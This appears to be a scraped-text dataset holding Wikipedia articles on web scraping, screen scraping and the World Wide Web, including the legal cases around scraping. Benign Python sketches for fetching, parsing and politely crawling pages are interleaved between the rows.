129 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-23 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
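Since the row above lists Scrapy among the common tools, here is a minimal spider sketch; it assumes Scrapy is installed, and the spider name and start URL are illustrative:

# Minimal Scrapy spider sketch (assumes `pip install scrapy`; names and URL are illustrative).
import scrapy

class LinkSpider(scrapy.Spider):
    name = "link_spider"
    start_urls = ["https://example.org"]

    def parse(self, response):
        # Yield one record per hyperlink found on the page.
        for href in response.css("a::attr(href)").getall():
            yield {"page": response.url, "link": response.urljoin(href)}

# Run from a shell with:  scrapy runspider link_spider.py -o links.json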
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
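Because site administrators can block or throttle bots, as noted at the end of the row above, a scraper should check robots.txt and pace its requests. A minimal standard-library sketch; the user agent string and target URL are illustrative:

# Check robots.txt and throttle requests before scraping (user agent and URL are illustrative).
import time
import urllib.robotparser

rp = urllib.robotparser.RobotFileParser()
rp.set_url("https://en.wikipedia.org/robots.txt")
rp.read()

user_agent = "MyResearchBot/0.1"
target = "https://en.wikipedia.org/wiki/Web_scraping"
if rp.can_fetch(user_agent, target):
    time.sleep(2)  # pause between requests to avoid overloading the server
    # ... fetch the page here ...
else:
    print("Disallowed by robots.txt:", target)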
131 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Screen_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
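The row above describes modern screen scraping as capturing the screen bitmap and running it through an OCR engine. A hedged sketch of that idea; it assumes Pillow, pytesseract, and the Tesseract binary are installed, and the screenshot filename is hypothetical:

# OCR-based screen scraping sketch (assumes Pillow, pytesseract, and Tesseract are installed;
# the screenshot filename is hypothetical).
from PIL import Image
import pytesseract

screenshot = Image.open("legacy_terminal_screen.png")
text = pytesseract.image_to_string(screenshot)  # convert the screen bitmap to plain text
print(text)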
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
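Report mining, as described above, extracts data from human-readable report files rather than live pages. A small sketch that parses a spooled text report into a table; the report layout and field names are hypothetical:

# Report-mining sketch: pull rows out of a human-readable text report
# (the report layout and field names are hypothetical).
import re
import pandas as pd

report = """\
INVOICE 1001   2024-01-05   $1,250.00
INVOICE 1002   2024-01-07     $980.50
"""

pattern = re.compile(r"INVOICE\s+(\d+)\s+(\d{4}-\d{2}-\d{2})\s+\$([\d,]+\.\d{2})")
rows = [
    {"invoice": m.group(1), "date": m.group(2), "amount": float(m.group(3).replace(",", ""))}
    for m in pattern.finditer(report)
]
print(pd.DataFrame(rows))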
132 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/World_Wide_Web | The World Wide Web (WWW or simply the Web) is an information system that enables content sharing over the Internet through user-friendly ways meant to appeal to users beyond IT specialists and hobbyists. 1 It allows documents and other web resources to be accessed over the Internet according to specific rules of the Hypertext Transfer Protocol (HTTP). 2 The Web was invented by English computer scientist Tim Berners-Lee while at CERN in 1989 and opened to the public in 1991. It was conceived as a "universal linked information system". 3 4 Documents and other media content are made available to the network through web servers and can be accessed by programs such as web browsers. Servers and resources on the World Wide Web are identified and located through character strings called uniform resource locators (URLs). The original and still very common document type is a web page formatted in Hypertext Markup Language (HTML). This markup language supports plain text, images, embedded video and audio contents, and scripts (short programs) that implement complex user interaction. The HTML language also supports hyperlinks (embedded URLs) which provide immediate access to other web resources. Web navigation, or web surfing, is the common practice of following such hyperlinks across multiple websites. Web applications are web pages that function as application software. The information in the Web is transferred across the Internet using HTTP. Multiple web resources with a common theme and usually a common domain name make up a website. A single web server may provide multiple websites, while some websites, especially the most popular ones, may be provided by multiple servers. Website content is provided by a myriad of companies, organizations, government agencies, and individual users; and comprises an enormous amount of educational, entertainment, commercial, and government information. The Web has become the world's dominant information systems platform. 5 6 7 8 It is the primary tool that billions of people worldwide use to interact with the Internet. 2 The Web was invented by English computer scientist Tim Berners-Lee while working at CERN. 9 10 He was motivated by the problem of storing, updating, and finding documents and data files in that large and constantly changing organization, as well as distributing them to collaborators outside CERN. In his design, Berners-Lee dismissed the common tree structure approach, used for instance in the existing CERNDOC documentation system and in the Unix filesystem, as well as approaches that relied in tagging files with keywords, as in the VAX NOTES system. Instead he adopted concepts he had put into practice with his private ENQUIRE system (1980) built at CERN. When he became aware of Ted Nelson's hypertext model (1965), in which documents can be linked in unconstrained ways through hyperlinks associated with "hot spots" embedded in the text, it helped to confirm the validity of his concept. 11 12 The model was later popularized by Apple's HyperCard system. Unlike Hypercard, Berners-Lee's new system from the outset was meant to support links between multiple databases on independent computers, and to allow simultaneous access by many users from any computer on the Internet. He also specified that the system should eventually handle other media besides text, such as graphics, speech, and video. 
Links could refer to mutable data files, or even fire up programs on their server computer. He also conceived "gateways" that would allow access through the new system to documents organized in other ways (such as traditional computer file systems or the Usenet). Finally, he insisted that the system should be decentralized, without any central control or coordination over the creation of links. 3 13 9 10 Berners-Lee submitted a proposal to CERN in May 1989, without giving the system a name. 3 He got a working system implemented by the end of 1990, including a browser called WorldWideWeb (which became the name of the project and of the network) and an HTTP server running at CERN. As part of that development he defined the first version of the HTTP protocol, the basic URL syntax, and implicitly made HTML the primary document format. 14 The technology was released outside CERN to other research institutions starting in January 1991, and then to the whole Internet on 23 August 1991. The Web was a success at CERN, and began to spread to other scientific and academic institutions. Within the next two years, there were 50 websites created. 15 16 CERN made the Web protocol and code available royalty free in 1993, enabling its widespread use. 17 18 After the NCSA released the Mosaic web browser later that year, the Web's popularity grew rapidly as thousands of websites sprang up in less than a year. 19 20 Mosaic was a graphical browser that could display inline images and submit forms that were processed by the HTTPd server. 21 22 Marc Andreessen and Jim Clark founded Netscape the following year and released the Navigator browser, which introduced Java and JavaScript to the Web. It quickly became the dominant browser. Netscape became a public company in 1995 which triggered a frenzy for the Web and started the dot-com bubble. 23 Microsoft responded by developing its own browser, Internet Explorer, starting the browser wars. By bundling it with Windows, it became the dominant browser for 14 years. 24 Berners-Lee founded the World Wide Web Consortium (W3C) which created XML in 1996 and recommended replacing HTML with stricter XHTML. 25 In the meantime, developers began exploiting an IE feature called XMLHttpRequest to make Ajax applications and launched the Web 2.0 revolution. Mozilla, Opera, and Apple rejected XHTML and created the WHATWG which developed HTML5. 26 In 2009, the W3C conceded and abandoned XHTML. 27 In 2019, it ceded control of the HTML specification to the WHATWG. 28 The World Wide Web has been central to the development of the Information Age and is the primary tool billions of people use to interact on the Internet. 29 30 31 8 Tim Berners-Lee states that World Wide Web is officially spelled as three separate words, each capitalised, with no intervening hyphens. 32 Nonetheless, it is often called simply the Web, and also often the web; see Capitalization of Internet for details. In Mandarin Chinese, World Wide Web is commonly translated via a phono-semantic matching to w n w i w ng ( ), which satisfies www and literally means "10,000 dimensional net", a translation that reflects the design concept and proliferation of the World Wide Web. Use of the www prefix has been declining, especially when web applications sought to brand their domain names and make them easily pronounceable. As the mobile Web grew in popularity, citation needed services like Gmail.com, Outlook.com, Myspace.com, Facebook.com and Twitter.com are most often mentioned without adding "www. 
(or, indeed, .com") to the domain. 33 In English, www is usually read as double-u double-u double-u. 34 Some users pronounce it dub-dub-dub, particularly in New Zealand. 35 Stephen Fry, in his "Podgrams" series of podcasts, pronounces it wuh wuh wuh. 36 The English writer Douglas Adams once quipped in The Independent on Sunday (1999): "The World Wide Web is the only thing I know of whose shortened form takes three times longer to say than what it's short for". 37 The terms Internet and World Wide Web are often used without much distinction. However, the two terms do not mean the same thing. The Internet is a global system of computer networks interconnected through telecommunications and optical networking. In contrast, the World Wide Web is a global collection of documents and other resources, linked by hyperlinks and URIs. Web resources are accessed using HTTP or HTTPS, which are application-level Internet protocols that use the Internet's transport protocols. 2 Viewing a web page on the World Wide Web normally begins either by typing the URL of the page into a web browser or by following a hyperlink to that page or resource. The web browser then initiates a series of background communication messages to fetch and display the requested page. In the 1990s, using a browser to view web pages—and to move from one web page to another through hyperlinks—came to be known as 'browsing, 'web surfing' (after channel surfing), or 'navigating the Web'. Early studies of this new behaviour investigated user patterns in using web browsers. One study, for example, found five user patterns: exploratory surfing, window surfing, evolved surfing, bounded navigation and targeted navigation. 38 The following example demonstrates the functioning of a web browser when accessing a page at the URL http: example.org home.html. The browser resolves the server name of the URL (example.org) into an Internet Protocol address using the globally distributed Domain Name System (DNS). This lookup returns an IP address such as 203.0.113.4 or 2001:db8:2e::7334. The browser then requests the resource by sending an HTTP request across the Internet to the computer at that address. It requests service from a specific TCP port number that is well known for the HTTP service so that the receiving host can distinguish an HTTP request from other network protocols it may be servicing. HTTP normally uses port number 80 and for HTTPS it normally uses port number 443. The content of the HTTP request can be as simple as two lines of text: The computer receiving the HTTP request delivers it to web server software listening for requests on port 80. If the webserver can fulfil the request it sends an HTTP response back to the browser indicating success: followed by the content of the requested page. Hypertext Markup Language (HTML) for a basic web page might look like this: The web browser parses the HTML and interprets the markup ( title , p for paragraph, and such) that surrounds the words to format the text on the screen. Many web pages use HTML to reference the URLs of other resources such as images, other embedded media, scripts that affect page behaviour, and Cascading Style Sheets that affect page layout. The browser makes additional HTTP requests to the web server for these other Internet media types. As it receives their content from the web server, the browser progressively renders the page onto the screen as specified by its HTML and these additional resources. 
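The row above walks through what a browser does: a DNS lookup, then a plain-text HTTP request to port 80. The same steps can be reproduced directly with sockets; the hostname is illustrative, and HTTPS would additionally need TLS on port 443:

# Resolve a hostname and send a raw HTTP/1.0 request over a socket (hostname is illustrative).
import socket

host = "example.org"
print("Resolved", host, "to", socket.gethostbyname(host))  # DNS lookup

with socket.create_connection((host, 80), timeout=10) as s:
    s.sendall(b"GET / HTTP/1.0\r\nHost: example.org\r\n\r\n")
    response = s.recv(4096)
print(response.decode(errors="replace")[:300])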
Hypertext Markup Language (HTML) is the standard markup language for creating web pages and web applications. With Cascading Style Sheets (CSS) and JavaScript, it forms a triad of cornerstone technologies for the World Wide Web. 39 Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for the appearance of the document. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p surround and provide information about document text and may include other tags as sub-elements. Browsers do not display the HTML tags, but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behaviour and content of web pages. Inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), maintainer of both the HTML and the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 40 Most web pages contain hyperlinks to other related pages and perhaps to downloadable files, source documents, definitions and other web resources. In the underlying HTML, a hyperlink looks like this: a href "http: example.org home.html" Example.org Homepage a . Such a collection of useful, related resources, interconnected via hypertext links is dubbed a web of information. Publication on the Internet created what Tim Berners-Lee first called the WorldWideWeb (in its original CamelCase, which was subsequently discarded) in November 1990. 41 The hyperlink structure of the web is described by the webgraph: the nodes of the web graph correspond to the web pages (or URLs) the directed edges between them to the hyperlinks. Over time, many web resources pointed to by hyperlinks disappear, relocate, or are replaced with different content. This makes hyperlinks obsolete, a phenomenon referred to in some circles as link rot, and the hyperlinks affected by it are often called "dead" links. The ephemeral nature of the Web has prompted many efforts to archive websites. The Internet Archive, active since 1996, is the best known of such efforts. Many hostnames used for the World Wide Web begin with www because of the long-standing practice of naming Internet hosts according to the services they provide. The hostname of a web server is often www, in the same way that it may be ftp for an FTP server, and news or nntp for a Usenet news server. These hostnames appear as Domain Name System (DNS) or subdomain names, as in www.example.com. The use of www is not required by any technical or policy standard and many web sites do not use it; the first web server was nxoc01.cern.ch. 
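Since the row above describes hyperlinks and the webgraph built from them, here is a small sketch that collects (page, link) edges from a single page; the URL is illustrative:

# Collect webgraph edges (page -> link) from a page's anchors (URL is illustrative).
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

page = "https://example.org"
soup = BeautifulSoup(requests.get(page, timeout=10).text, "html5lib")
edges = [(page, urljoin(page, a["href"])) for a in soup.find_all("a", href=True)]
for src, dst in edges[:10]:
    print(src, "->", dst)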
42 According to Paolo Palazzi, who worked at CERN along with Tim Berners-Lee, the popular use of www as subdomain was accidental; the World Wide Web project page was intended to be published at www.cern.ch while info.cern.ch was intended to be the CERN home page; however the DNS records were never switched, and the practice of prepending www to an institution's website domain name was subsequently copied. 43 better source needed Many established websites still use the prefix, or they employ other subdomain names such as www2, secure or en for special purposes. Many such web servers are set up so that both the main domain name (e.g., example.com) and the www subdomain (e.g., www.example.com) refer to the same site; others require one form or the other, or they may map to different web sites. The use of a subdomain name is useful for load balancing incoming web traffic by creating a CNAME record that points to a cluster of web servers. Since, currently as of? , only a subdomain can be used in a CNAME, the same result cannot be achieved by using the bare domain root. 44 dubious discuss When a user submits an incomplete domain name to a web browser in its address bar input field, some web browsers automatically try adding the prefix "www" to the beginning of it and possibly .com", .org" and .net" at the end, depending on what might be missing. For example, entering "microsoft" may be transformed to http: www.microsoft.com and "openoffice" to http: www.openoffice.org. This feature started appearing in early versions of Firefox, when it still had the working title 'Firebird' in early 2003, from an earlier practice in browsers such as Lynx. 45 unreliable source? It is reported that Microsoft was granted a US patent for the same idea in 2008, but only for mobile devices. 46 The scheme specifiers http: and https: at the start of a web URI refer to Hypertext Transfer Protocol or HTTP Secure, respectively. They specify the communication protocol to use for the request and response. The HTTP protocol is fundamental to the operation of the World Wide Web, and the added encryption layer in HTTPS is essential when browsers send or retrieve confidential data, such as passwords or banking information. Web browsers usually automatically prepend http: to user-entered URIs, if omitted. A web page (also written as webpage) is a document that is suitable for the World Wide Web and web browsers. A web browser displays a web page on a monitor or mobile device. The term web page usually refers to what is visible, but may also refer to the contents of the computer file itself, which is usually a text file containing hypertext written in HTML or a comparable markup language. Typical web pages provide hypertext for browsing to other web pages via hyperlinks, often referred to as links. Web browsers will frequently have to access multiple web resource elements, such as reading style sheets, scripts, and images, while presenting each web page. On a network, a web browser can retrieve a web page from a remote web server. The web server may restrict access to a private network such as a corporate intranet. The web browser uses the Hypertext Transfer Protocol 